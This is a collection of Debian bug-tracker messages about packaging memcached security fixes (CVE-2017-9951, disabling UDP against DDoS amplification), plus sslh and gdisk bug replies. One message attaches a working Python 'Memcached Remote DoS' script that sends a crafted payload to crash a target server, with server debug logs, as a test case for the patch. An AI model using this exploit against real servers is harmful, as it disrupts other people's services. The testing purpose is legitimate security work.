Bug#873758: stretch-pu: package memcached/1.4.33-1
Hi, I'm sorry i haven't find a sponsor to upload the security fix for CVE-2017-9951 yet. There is another fix that need to be uploaded to security: CVE-2018-1000115: $ dpkg --list memcached Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad) ||/ Name Version ArchitectureDescription +++-=-===-===-=== ii memcached 1.4.33-1 amd64 high-performance memory object caching system $ sudo netstat -ltunp | grep memcached tcp0 0 0.0.0.0:11211 0.0.0.0:* LISTEN 31885/memcached tcp6 0 0 :::11211:::*LISTEN 31885/memcached udp0 0 0.0.0.0:11211 0.0.0.0:* 31885/memcached udp6 0 0 :::11211:::* 31885/memcached Versus: $ dpkg --list memcached Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad) ||/ Name Version ArchitectureDescription +++-=-===-===-=== ii memcached 1.4.33-1+deb9u1 amd64 high-performance memory object caching system $ sudo netstat -ltunp | grep memcached tcp0 0 0.0.0.0:11211 0.0.0.0:* LISTEN 478/memcached tcp6 0 0 :::11211:::*LISTEN 478/memcached Please find attached the following debdiff. -- Guillaume Delacour diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog --- memcached-1.4.33/debian/changelog 2016-11-03 01:50:27.0 +0100 +++ memcached-1.4.33/debian/changelog 2018-03-08 13:46:07.0 +0100 @@ -1,3 +1,15 @@ +memcached (1.4.33-1+deb9u1) stretch; urgency=high + + * Fix CVE-2017-9951 by checking the integer length of commands that adds or +replaces key/value pair + * Fix CVE-2018-1000115 ++ debian/patches/10_CVE-2018-1000115.patch disable listening on UDP port by + default (from Ubuntu) ++ debian/NEWS add explanation and document how to re-enable UDP if + necessary. + + -- Guillaume Delacour <g...@iroqwa.org> Thu, 08 Mar 2018 13:46:07 +0100 + memcached (1.4.33-1) unstable; urgency=medium * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706 diff -Nru memcached-1.4.33/debian/NEWS memcached-1.4.33/debian/NEWS --- memcached-1.4.33/debian/NEWS 2016-07-02 10:24:46.0 +0200 +++ memcached-1.4.33/debian/NEWS 2018-03-08 13:46:07.0 +0100 @@ -1,3 +1,11 @@ +memcached (1.4.33-1+deb9u1) stretch; urgency=high + + * memcached is now configured to disable its UDP port by default, to +prevent its use as a DDoS amplifier. To re-enable UDP service, add +'-U 11211' to /etc/memcached.conf and restart the memcached service. + + -- Steve Beattie <sbeat...@ubuntu.com> Fri, 02 Mar 2018 12:52:44 -0800 + memcached (1.4.20-1) unstable; urgency=medium Starting with this release, a system user "memcache" will be created. diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch --- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 1970-01-01 01:00:00.0 +0100 +++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 2018-03-06 21:44:06.0 +0100 @@ -0,0 +1,36 @@ +From: dormando <dorma...@rydia.net> +Date: Tue, 4 Jul 2017 00:32:39 -0700 +Subject: [PATCH] sanity check (CVE-2017-9951) +Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167 + +--- + items.c | 2 ++ + memcached.c | 2 +- + 2 files changed, 3 insertions(+), 1 deletion(-) + +diff --git a/items.c b/items.c +index 637e5e745..83a2ea37d 100644 +--- a/items.c b/items.c +@@ -368,6 +368,8 @@ void item_free(item *it) { + bool item_size_ok(const size_t nkey, const int flags, const int nbytes) { + char prefix[40]; + uint8_t nsuffix; ++if (nbytes < 2) ++return false; + + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, + prefix, ); +diff --git a/memcached.c b/memcached.c +index 0f0335795..a89df965d 1
Bug#891907: memcached should disable UDP by default
Hi, Le 02/03/2018 à 12:39, Hanno Böck a écrit : > Package: memcached > Version: 1.4.33-1 > > Memcached is currently involved in some massive ddos attacks, see e.g.: > https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/ > > The UDP protocol of memcached can be abused for very effective DDoS > amplification attacks and should therefore be considered dangerous. > Upstream memcached has reacted to this by disabling UDP by default: > https://github.com/memcached/memcached/wiki/ReleaseNotes156 > > In Debian memcached by default only listens to 127.0.0.1, but enables > UDP. While the localhost-only protects default settings, it's still > only a minor change away from creating an effective DDoS tool for a > protocol that is hardly in use today. I recommend that you backport > the upstream change and disable UDP by default. > The version 1.5.6 will be uploaded in the archive in a few days. I'll try to propose a backport patch at least for versions in stretch and jessie (with upstream review, if possible). -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#863517: sslh systemd service file doesn't honor /etc/default/sslh
Hi, Le 28/05/2017 à 00:09, Cord Beermann a écrit : > Package: sslh > Version: 1.18-1 > Severity: normal > > Hello, > > I want to use sslh.service with the sslh-select option, but in > /lib/systemd/system/sslh.service is /usr/sbin/sslh hardcoded. > > It should user the information in /etc/default/sslh instead (or switch over > to update-alternatives?) systemd does not support a variable into ExecStart: # service sslh status ● sslh.service - SSL/SSH multiplexer Loaded: error (Reason: Invalid argument) [...] [/lib/systemd/system/sslh.service:8] Executable path is not absolute, ignoring: $DAEMON --foreground $DAEMON_OPTS One other way is to wrapp the startup, or use alternative. I'll look to this. > > Cord > > -- System Information: > Debian Release: 8.8 > APT prefers stable > APT policy: (999, 'stable'), (799, 'stable-updates'), (798, > 'proposed-updates'), (500, 'oldstable'), (299, 'testing'), (199, 'unstable'), > (1, 'experimental') > Architecture: amd64 (x86_64) > > Kernel: Linux 4.9.0-0.bpo.3-amd64 (SMP w/2 CPU cores) > Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8) > Shell: /bin/sh linked to /bin/dash > Init: systemd (via /run/systemd/system) > > Versions of packages sslh depends on: > ii adduser 3.113+nmu3 > ii debconf 1.5.56 > ii init-system-helpers 1.22 > ii libc62.19-18+deb8u9 > ii libcap2 1:2.24-8 > ii libconfig9 1.4.9-2 > ii libwrap0 7.6.q-25 > ii lsb-base 4.1+Debian13+nmu1 > ii update-inetd 4.43 > > Versions of packages sslh recommends: > ii apache2 [httpd] 2.4.10-10+deb8u8 > ii openssh-server [ssh-server] 1:6.7p1-5+deb8u3 > > Versions of packages sslh suggests: > ii openbsd-inetd [inet-superserver] 0.20140418-2 > > -- debconf information: > * sslh/inetd_or_standalone: standalone > -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#888529: memcached: Systemd private tmp breaks unix socket access to memcached
tags 888529 + moreinfo thanks Hi, Le 26/01/2018 à 19:57, Dennis Boone a écrit : > Package: memcached > Version: 1.5.4-1 > Severity: important > > After applying this version the other night, our application was no > longer able to connect to memcached via its unix socket. (Since the > systemd private tmp functionality is a damned rootkit, it too a while to > diagnose this problem.) The distributed configuration file appears to > place the unix socket in /tmp. The distributed configuration file does not provide a socket file enabled; where is the socket you've defined with options "-s, --unix-socket=" ? Provided config files: https://anonscm.debian.org/cgit/collab-maint/memcached.git/tree/debian/memcached.conf && https://github.com/memcached/memcached/blob/master/scripts/memcached.service && https://anonscm.debian.org/cgit/collab-maint/memcached.git/tree/debian/patches/02_service_wrapper.patch > > If systemd private tmp is to be enabled for memcached, the distributed > configuration should place the unix socket elsewhere. Alternately, > private tmp could be disabled for memached. > > > -- System Information: > Debian Release: buster/sid > APT prefers unstable > APT policy: (500, 'unstable') > Architecture: amd64 (x86_64) > > Kernel: Linux 4.14.0-3-amd64 (SMP w/8 CPU cores) > Locale: LANG=en_US.UTF-8, LC_CTYPE=es_US.UTF-8 (charmap=UTF-8) (ignored: > LC_ALL set to es_US.UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8) (ignored: > LC_ALL set to es_US.UTF-8) > Shell: /bin/sh linked to /bin/bash > Init: systemd (via /run/systemd/system) > > Versions of packages memcached depends on: > ii adduser 3.116 > ii libc6 2.26-5 > ii libevent-2.1-6 2.1.8-stable-4 > ii libsasl2-2 2.1.27~101-g0780600+dfsg-3 > ii lsb-base9.20170808 > ii perl5.26.1-4 > > memcached recommends no packages. > > Versions of packages memcached suggests: > pn libanyevent-perl > pn libcache-memcached-perl > pn libmemcached > ii libterm-readkey-perl 2.37-1+b2 > pn libyaml-perl > > -- no debconf information > -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#870819: gdisk: New upstream version 1.0.3 available
Hi, On Sat, 5 Aug 2017 16:12:54 +0200 Christoph Biedl <debian.a...@manchmal.in-ulm.de> wrote: > Package: gdisk > Version: 1.0.1-1 > Severity: normal > > Dear Maintainer, > > upstream released a new version recently. Looking into the changes I > found the following: > > | Fixed a major bug that caused invalid partition tables to be generated > | under some conditions. > > In my humble opinion this justifies a swift upload of the new version. > There are also some interesting changes listed for 1.0.2 I've prepared a new version on mentors and have such bug reports against upstream code to changes/discuss. I've asked upstream some help to triage them. If no news received in the next few days, i'll try to contact my sponsor to upload the new upstream release "as is". > > Christoph > -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#702963: gdisk doesn't align the end of partition
Hi, On Wed, 13 Mar 2013 17:11:32 +0400 sergio <mail...@sergio.spb.ru> wrote: > Package: gdisk > Version: 0.8.5-1 > Severity: important > > gdisk doesn't align the end of partition: > > > % dd if=/dev/zero of=test count=22 > % /sbin/gdisk test > > Command (? for help): o > This option deletes all partitions and creates a new protective MBR. > Proceed? (Y/N): Y > > Command (? for help): n > Partition number (1-128, default 1): > First sector (34-199968, default = 2048) or {+-}size{KMGTP}: > Last sector (2048-199968, default = 199968) or {+-}size{KMGTP}: > > Sorry for my very late answer. Did you reproduce that on Debian 9 Stretch with release 1.0.1 ? Upstream has made many improvements in this release. -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#778325: sgdisk --new changes given end sector parameter when using a unit for the start sector
Hi, On Fri, 13 Feb 2015 15:31:32 + Fabian Niepelt <f.niep...@mittwald.de> wrote: [...] > > I'm on Debian 7.0, amd64. > Sorry for the lack of answer. Do you have the same problem on Debian Stretch with version 1.0.1 ? -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#873758: stretch-pu: package memcached/1.4.33-1
Le 12/09/2017 à 22:55, Adam D. Barratt a écrit : > On Tue, 2017-09-12 at 22:52 +0200, Guillaume Delacour wrote: >> Le 30/08/2017 à 21:58, Adam D. Barratt a écrit : >>> Control: tags -1 + confirmed >>> >>> On Wed, 2017-08-30 at 21:33 +0200, g...@iroqwa.org wrote: >>>> The attached patch fix CVE-2017-9951 which has been not fixed via >>>> a DSA, >>>> as discussed with Salvatore Bonaccorso: https://bugs.debian.org/8 >>>> 68701. >>> >>> +memcached (1.4.33-1+deb9u1) stretch; urgency=high >>> + >>> + * Non-maintainer upload by the Security Team. >>> >>> So far as I can tell, you're not a member of the Security Team, so >>> this >>> is incorrect. >> >> Sure, please find attached the fixed debdiff, as i'm not a member of >> the >> security team. I've also changed the distribution from stretch to >> stretch-security. > > Why? "stretch-security" is an appropriate distribution to use for > uploads to the security archive, in which case you should be talking to > the Security Team, not us. Assuming you're still proposing an update > via proposed-updates and a point release, "stretch" was correct. Indeed, absolutely right. Updated version attached. > > Regards, > > Adam > -- Guillaume Delacour diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog --- memcached-1.4.33/debian/changelog 2016-11-03 01:50:27.0 +0100 +++ memcached-1.4.33/debian/changelog 2017-07-25 00:38:52.0 +0200 @@ -1,3 +1,10 @@ +memcached (1.4.33-1+deb9u1) stretch; urgency=high + + * Fix CVE-2017-9951 by checking the integer length of commands that adds or +replaces key/value pair + + -- Guillaume Delacour <g...@iroqwa.org> Tue, 25 Jul 2017 00:38:52 +0200 + memcached (1.4.33-1) unstable; urgency=medium * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706 diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch --- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 1970-01-01 01:00:00.0 +0100 +++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 2017-07-25 00:38:52.0 +0200 @@ -0,0 +1,36 @@ +From: dormando <dorma...@rydia.net> +Date: Tue, 4 Jul 2017 00:32:39 -0700 +Subject: [PATCH] sanity check (CVE-2017-9951) +Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167 + +--- + items.c | 2 ++ + memcached.c | 2 +- + 2 files changed, 3 insertions(+), 1 deletion(-) + +diff --git a/items.c b/items.c +index 637e5e745..83a2ea37d 100644 +--- a/items.c b/items.c +@@ -368,6 +368,8 @@ void item_free(item *it) { + bool item_size_ok(const size_t nkey, const int flags, const int nbytes) { + char prefix[40]; + uint8_t nsuffix; ++if (nbytes < 2) ++return false; + + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, + prefix, ); +diff --git a/memcached.c b/memcached.c +index 0f0335795..a89df965d 100644 +--- a/memcached.c b/memcached.c +@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) { + + case conn_swallow: + /* we are reading sbytes and throwing them away */ +-if (c->sbytes == 0) { ++if (c->sbytes <= 0) { + conn_set_state(c, conn_new_cmd); + break; + } diff -Nru memcached-1.4.33/debian/patches/series memcached-1.4.33/debian/patches/series --- memcached-1.4.33/debian/patches/series 2016-08-21 18:48:58.0 +0200 +++ memcached-1.4.33/debian/patches/series 2017-07-25 00:38:52.0 +0200 @@ -1,3 +1,4 @@ 01_init_script_additions.patch 04_add_init_retry.patch 07_disable_tests.patch +09_CVE-2017-9951.patch signature.asc Description: OpenPGP digital signature
Bug#873758: stretch-pu: package memcached/1.4.33-1
Le 30/08/2017 à 21:58, Adam D. Barratt a écrit : > Control: tags -1 + confirmed > > On Wed, 2017-08-30 at 21:33 +0200, g...@iroqwa.org wrote: >> The attached patch fix CVE-2017-9951 which has been not fixed via a DSA, >> as discussed with Salvatore Bonaccorso: https://bugs.debian.org/868701. > > +memcached (1.4.33-1+deb9u1) stretch; urgency=high > + > + * Non-maintainer upload by the Security Team. > > So far as I can tell, you're not a member of the Security Team, so this > is incorrect. Sure, please find attached the fixed debdiff, as i'm not a member of the security team. I've also changed the distribution from stretch to stretch-security. > > + * Fix CVE-2017-9951 by checking the integer length of commands that adds or > +replaces key/value pair > + > + -- Guillaume Delacour <g...@iroqwa.org> Tue, 25 Jul 2017 00:38:52 +0200 > > Please go ahead, bearing in mind the above comment. As i'm not a DD nor DM i can't upload this directly, could you do this for me as a mentoring ? I also need to provide this kind of changes for Jessie. > > Regards, > > Adam > -- Guillaume Delacour diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog --- memcached-1.4.33/debian/changelog 2016-11-03 01:50:27.0 +0100 +++ memcached-1.4.33/debian/changelog 2017-07-25 00:38:52.0 +0200 @@ -1,3 +1,10 @@ +memcached (1.4.33-1+deb9u1) stretch-security; urgency=high + + * Fix CVE-2017-9951 by checking the integer length of commands that adds or +replaces key/value pair + + -- Guillaume Delacour <g...@iroqwa.org> Tue, 25 Jul 2017 00:38:52 +0200 + memcached (1.4.33-1) unstable; urgency=medium * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706 diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch --- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 1970-01-01 01:00:00.0 +0100 +++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 2017-07-25 00:38:52.0 +0200 @@ -0,0 +1,36 @@ +From: dormando <dorma...@rydia.net> +Date: Tue, 4 Jul 2017 00:32:39 -0700 +Subject: [PATCH] sanity check (CVE-2017-9951) +Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167 + +--- + items.c | 2 ++ + memcached.c | 2 +- + 2 files changed, 3 insertions(+), 1 deletion(-) + +diff --git a/items.c b/items.c +index 637e5e745..83a2ea37d 100644 +--- a/items.c b/items.c +@@ -368,6 +368,8 @@ void item_free(item *it) { + bool item_size_ok(const size_t nkey, const int flags, const int nbytes) { + char prefix[40]; + uint8_t nsuffix; ++if (nbytes < 2) ++return false; + + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, + prefix, ); +diff --git a/memcached.c b/memcached.c +index 0f0335795..a89df965d 100644 +--- a/memcached.c b/memcached.c +@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) { + + case conn_swallow: + /* we are reading sbytes and throwing them away */ +-if (c->sbytes == 0) { ++if (c->sbytes <= 0) { + conn_set_state(c, conn_new_cmd); + break; + } diff -Nru memcached-1.4.33/debian/patches/series memcached-1.4.33/debian/patches/series --- memcached-1.4.33/debian/patches/series 2016-08-21 18:48:58.0 +0200 +++ memcached-1.4.33/debian/patches/series 2017-07-25 00:38:52.0 +0200 @@ -1,3 +1,4 @@ 01_init_script_additions.patch 04_add_init_retry.patch 07_disable_tests.patch +09_CVE-2017-9951.patch signature.asc Description: OpenPGP digital signature
Bug#868701: memcached: CVE-2017-9951: Heap-based buffer over-read in try_read_command function
On Mon, Jul 17, 2017 at 10:34:23PM +0200, Salvatore Bonaccorso wrote: > Please adjust the affected versions in the BTS as needed. > Please find attached the debdiff for Debian 9 Stretch. Also, you can find a little test case (and results) without (CVE-2017-9951_1.4.33.log) and with the fix (CVE-2017-9951_1.4.33_fixed.log). I've build and test it on a clean stretch schroot. -- Guillaume Delacour diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog --- memcached-1.4.33/debian/changelog 2016-11-03 01:50:27.0 +0100 +++ memcached-1.4.33/debian/changelog 2017-07-25 00:38:52.0 +0200 @@ -1,3 +1,11 @@ +memcached (1.4.33-1+deb9u1) unstable; urgency=high + + * Non-maintainer upload by the Security Team. + * Fix CVE-2017-9951 by checking the integer length of commands that adds or +replaces key/value pair + + -- Guillaume Delacour <g...@iroqwa.org> Tue, 25 Jul 2017 00:38:52 +0200 + memcached (1.4.33-1) unstable; urgency=medium * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706 diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch --- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 1970-01-01 01:00:00.0 +0100 +++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 2017-07-24 21:59:20.0 +0200 @@ -0,0 +1,37 @@ +From 328629445c71e6c17074f6e9e0e3ef585b58f167 Mon Sep 17 00:00:00 2001 +From: dormando <dorma...@rydia.net> +Date: Tue, 4 Jul 2017 00:32:39 -0700 +Subject: [PATCH] sanity check +Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167 + +--- + items.c | 2 ++ + memcached.c | 2 +- + 2 files changed, 3 insertions(+), 1 deletion(-) + +diff --git a/items.c b/items.c +index 637e5e745..83a2ea37d 100644 +--- a/items.c b/items.c +@@ -368,6 +368,8 @@ void item_free(item *it) { + bool item_size_ok(const size_t nkey, const int flags, const int nbytes) { + char prefix[40]; + uint8_t nsuffix; ++if (nbytes < 2) ++return false; + + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, + prefix, ); +diff --git a/memcached.c b/memcached.c +index 0f0335795..a89df965d 100644 +--- a/memcached.c b/memcached.c +@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) { + + case conn_swallow: + /* we are reading sbytes and throwing them away */ +-if (c->sbytes == 0) { ++if (c->sbytes <= 0) { + conn_set_state(c, conn_new_cmd); + break; + } diff -Nru memcached-1.4.33/debian/patches/series memcached-1.4.33/debian/patches/series --- memcached-1.4.33/debian/patches/series 2016-08-21 18:48:58.0 +0200 +++ memcached-1.4.33/debian/patches/series 2017-07-25 00:38:52.0 +0200 @@ -1,3 +1,4 @@ 01_init_script_additions.patch 04_add_init_retry.patch 07_disable_tests.patch +09_CVE-2017-9951.patch <26 new auto-negotiating client connection 26: going from conn_new_cmd to conn_waiting 26: going from conn_waiting to conn_read 26: going from conn_read to conn_parse_cmd 26: Client using the binary protocol <26 Read binary protocol data: <260x80 0x12 0x00 0x01 <260x08 0x00 0x00 0x00 <260xff 0xff 0xff 0xe8 <260x00 0x00 0x00 0x00 <260x00 0x00 0x00 0x00 <260x00 0x00 0x00 0x00 26: going from conn_parse_cmd to conn_nread <26 ADD x Value len is -33 >26 Writing an error: Out of memory allocating item >26 Writing bin response: >26 0x81 0x12 0x00 0x00 >26 0x00 0x00 0x00 0x82 >26 0x00 0x00 0x00 0x1d >26 0x00 0x00 0x00 0x00 >26 0x00 0x00 0x00 0x00 >26 0x00 0x00 0x00 0x00 26: going from conn_nread to conn_mwrite 26: going from conn_mwrite to conn_swallow 26: going from conn_swallow to conn_new_cmd 26: going from conn_new_cmd to conn_parse_cmd <26 Read binary protocol data: <260x80 0x12 0x00 0x01 <260x08 0x00 0x00 0x00 <260xff 0xff 0xff 0xe8 <260x00 0x00 0x00 0x00 <260x00 0x00 0x00 0x00 <260x00 0x00 0x00 0x00 26: going from conn_parse_cmd to conn_nread <26 ADD x Value len is -33 >26 Writing an error: Out of memory allocating item >26 Writing bin response: >26 0x81 0x12 0x00 0x00 >26 0x00 0x00 0x00 0x82 >26 0x00 0x00 0x00 0x1d >26 0x00 0x00 0x00 0x00 >26 0x00 0x00 0x00 0x00 >26 0x00 0x00 0x00 0x00 26: going from conn_nread to conn_mwrite Failed to write, and not due to blocking: Broken pipe 26: going from conn_mwrite to conn_closing <26 connection closed. 26: going from conn_closing to conn_closed <26 new auto-negotiating client connection 26: going from conn_new_cmd to conn_waiting 26: going from conn_waiting to conn_read 26: going from conn_read to conn_parse_cmd 26: Client using the binary protocol <26 Read binary protocol data:
Bug#868701: memcached: CVE-2017-9951: Heap-based buffer over-read in try_read_command function
On Mon, Jul 17, 2017 at 10:34:23PM +0200, Salvatore Bonaccorso wrote: > > Please adjust the affected versions in the BTS as needed. Please find attached the debdiff for Debian 8 Jessie. Also, you can find a little test case (and results) without (CVE-2017-9951_exploit.log) and with the fix (CVE-2017-9951_fixed.log). I've build and test it on a clean jessie schroot. > > Regards, > Salvatore > -- Guillaume Delacour diff -Nru memcached-1.4.21/debian/changelog memcached-1.4.21/debian/changelog --- memcached-1.4.21/debian/changelog 2016-11-01 21:10:45.0 + +++ memcached-1.4.21/debian/changelog 2017-07-24 20:07:10.0 + @@ -1,3 +1,11 @@ +memcached (1.4.21-1.1+deb8u2) unstable; urgency=high + + * Non-maintainer upload by the Security Team. + * Fix CVE-2017-9951 by checking the integer length of commands that adds or +replaces key/value pair + + -- Guillaume Delacour <g...@iroqwa.org> Mon, 24 Jul 2017 19:54:18 + + memcached (1.4.21-1.1+deb8u1) jessie-security; urgency=high * Non-maintainer upload by the Security Team. diff -Nru memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch --- memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch 1970-01-01 00:00:00.0 + +++ memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch 2017-07-24 19:59:20.0 + @@ -0,0 +1,37 @@ +From 328629445c71e6c17074f6e9e0e3ef585b58f167 Mon Sep 17 00:00:00 2001 +From: dormando <dorma...@rydia.net> +Date: Tue, 4 Jul 2017 00:32:39 -0700 +Subject: [PATCH] sanity check +Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167 + +--- + items.c | 2 ++ + memcached.c | 2 +- + 2 files changed, 3 insertions(+), 1 deletion(-) + +diff --git a/items.c b/items.c +index 637e5e745..83a2ea37d 100644 +--- a/items.c b/items.c +@@ -368,6 +368,8 @@ void item_free(item *it) { + bool item_size_ok(const size_t nkey, const int flags, const int nbytes) { + char prefix[40]; + uint8_t nsuffix; ++if (nbytes < 2) ++return false; + + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, + prefix, ); +diff --git a/memcached.c b/memcached.c +index 0f0335795..a89df965d 100644 +--- a/memcached.c b/memcached.c +@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) { + + case conn_swallow: + /* we are reading sbytes and throwing them away */ +-if (c->sbytes == 0) { ++if (c->sbytes <= 0) { + conn_set_state(c, conn_new_cmd); + break; + } diff -Nru memcached-1.4.21/debian/patches/series memcached-1.4.21/debian/patches/series --- memcached-1.4.21/debian/patches/series 2016-11-01 21:10:45.0 + +++ memcached-1.4.21/debian/patches/series 2017-07-24 20:07:26.0 + @@ -5,3 +5,4 @@ 06_eol_comment_handling.patch 07_disable_tests.patch 08_CVE-2016-8704_CVE-2016-8705_CVE-2016-8706.patch +09_CVE-2017-9951.patch #!/usr/bin/python # thanks https://packetstormsecurity.com/files/121445/killthebox.py.txt && # https://www.twistlock.com/2017/07/13/cve-2017-9951-heap-overflow-memcached-server-1-4-38-twistlock-vulnerability-report/ import sys import socket print "Memcached Remote DoS" if len(sys.argv) != 3: print "Usage: %s " %(sys.argv[0]) sys.exit(1) target = sys.argv[1] port = sys.argv[2] print "[+] Target Host: %s" %(target) print "[+] Target Port: %s" %(port) kill = """\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff""" kill +="""\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00""" kill +="""\x00\xff\xff\xff\xff\x01\x00\x00\0x{}""".format("41"*1000) hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) try: hax.connect((target, int(port))) print "[+] Connected, firing payload!" except: print "[-] Connection Failed... Is there even a target?" sys.exit(1) try: hax.send(kill) print "[+] Payload Sent!" except: print "[-] Payload Sending Failure... WTF?" sys.exit(1) hax.close() print "[*] Should be dead..." <26 new auto-negotiating client connection 26: going from conn_new_cmd to conn_waiting 26: going from conn_waiting to conn_read 26: going from conn_read to conn_parse_cmd 26: Client using the binary protocol <26 Read binary protocol data: <260x80 0x12 0x00 0x01 <260x08 0x00 0x00 0x00 <260xff 0xff 0xff 0xe8 <260x00 0x00 0x00 0x00 <260x00 0x00 0x00 0x00 <260x00 0x00 0x00 0x00 26: going from conn_parse_cmd to conn_nread <26 ADD x Value len is -33 >26 Writing an error: Out of memory allocating item >26 Writing bin response: >26 0x81 0x12 0x00 0x00 >26
Bug#853544: memcached: ftbfs with GCC-7
tags 853544 + pending thanks On Tue, 21 Mar 2017 21:37:27 +0100 Guillaume Delacour <g...@iroqwa.org> wrote: > tags 853544 upstream fixed-upstream > thanks > > > All is now fine with release 1.4.36 > (https://github.com/memcached/memcached/commit/64bbbf4c7655a540247db4b608b00f809742f24b), > will be released after the freeze in unstable. > I've prepared version 1.5.0, which will be uploaded soon. -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#869479: memcached: New upstream version available
tags 869479 + pending thanks On Sun, Jul 23, 2017 at 05:14:52PM +0200, Salvatore Bonaccorso wrote: > Source: memcached > Severity: wishlist > > Hi Hi, > > There is a new upsteam version available, v1.5.0. Could you please > package the new version? I've prepared it on mentors [0] and my current mentor will upload it soon surely at the end of this week. [0]: https://mentors.debian.net/debian/pool/main/m/memcached/memcached_1.5.0-1.dsc > > Regards, > Salvatore > -- Guillaume Delacour signature.asc Description: Digital signature
Bug#842634: Bug#851877: fails every time
Hi, Le 15/05/2017 à 00:50, Adam Borowski a écrit : > > So it's a fully _reproducible_ bug, with a well-defined immediate cause > (even if we haven't identified the indirect cause yet) -- unlike the > original report by Santiago Villa. Thus, it looks we have two different > bugs that just happen to trigger the same failure mode. > > And thus, even if we fix the schroot issue, Santiago's bug likely won't be > fixed. > >> Now, the next question is: where does this /etc/hosts come from? The file >> is present in the above form directly after unpacking the schroot tarball, >> before even entering the schroot. > >> Running debootstrap does not produce an /etc/hosts in --variant=minbase and >> --variant=buildd. When run without --variant, it does produce an >> /etc/hosts, but that looks correct: > [snip] >> So, where does the file get mangled? I can’t find any traces in the schroot >> and sbuild sources. Does anyone know by chance? > > Even more puzzling: I just recreated the chroot again, and despite using the > very same command to do so as before (last on 2017-05-04) there's no > /etc/hosts in the chroot now, which makes sslh build correctly. > > The version from 2017-05-04 includes has an /etc/hosts, with ::1 replaced by > 127.0.0.1 just as you noticed. And I see no uploads of debootstrap, sbuild, > schroot or a package that looks related in that time period. > > Got an unrelated big build running at the moment, once it's done I'll boot > from a snapshot (got backups from 2017-05-01 (plus earliers) and dailies > since 2017-05-06) to see if it's a matter of an installed package. > > But again, this is probably unrelated to Santiago's bug other than for the > results. As this bug is not related to sslh package itself, i've removed the pending tag, i let Michael revert https://anonscm.debian.org/cgit/collab-maint/sslh.git/commit/?id=243bb3faa682afa8168664eaf5a4f72cfc21ee27 and closing this bug to disable the autoremoval in testing. -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#851877: fails every time
